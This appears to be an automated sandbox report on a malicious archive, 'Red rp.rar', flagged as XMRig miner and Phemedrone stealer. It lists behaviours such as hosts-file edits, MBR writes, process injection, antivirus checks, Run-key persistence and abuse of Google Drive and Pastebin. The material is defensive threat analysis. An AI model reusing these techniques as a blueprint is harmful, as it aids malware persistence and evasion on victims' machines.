Analysis Overview
SHA256
479e80f23b0799ead92adcd6fd52b03a65d73218d55596688817c431afd3df16
Threat Level: Known bad
The file Red rp.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
Phemedrone
XMRig Miner payload
Stops running service(s)
Blocklisted process makes network request
Drops file in Drivers directory
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
UPX packed file
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Checks installed software on the system
Checks for any installed AV software in registry
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Runs regedit.exe
Modifies Internet Explorer settings
Suspicious behavior: LoadsDriver
Enumerates system info in registry
Modifies registry class
Opens file in notepad (likely ransom note)
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-06 09:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-06 09:25
Reported
2024-06-06 09:51
Platform
win10-20240404-en
Max time kernel
1068s
Max time network
1203s
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\soft\regedit.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\soft\regedit.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\soft\regedit.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\CockroachOnDesktop | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\SOFTWARE\AVAST Software\Avast | C:\Users\Admin\Downloads\avg_secure_browser_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\SOFTWARE\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\soft\regedit.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\soft\regedit.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\soft\regedit.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\soft\regedit.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1832 set thread context of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2648 set thread context of 4336 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1992 set thread context of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 7104 set thread context of 7160 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 6916 set thread context of 6976 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Cockroach on Desktop\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
| File created | C:\Program Files (x86)\Cockroach on Desktop\is-2M65O.tmp | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
| File created | C:\Program Files (x86)\Cockroach on Desktop\is-L46CM.tmp | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
| File created | C:\Program Files (x86)\Cockroach on Desktop\is-8F9NK.tmp | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
| File created | C:\Program Files (x86)\Cockroach on Desktop\is-BGDNI.tmp | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
| File created | C:\Program Files (x86)\Cockroach on Desktop\is-MNA5H.tmp | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Cockroach on Desktop\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\INF\netsstpa.PNF | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\INF\netrasa.PNF | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ajCD22.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
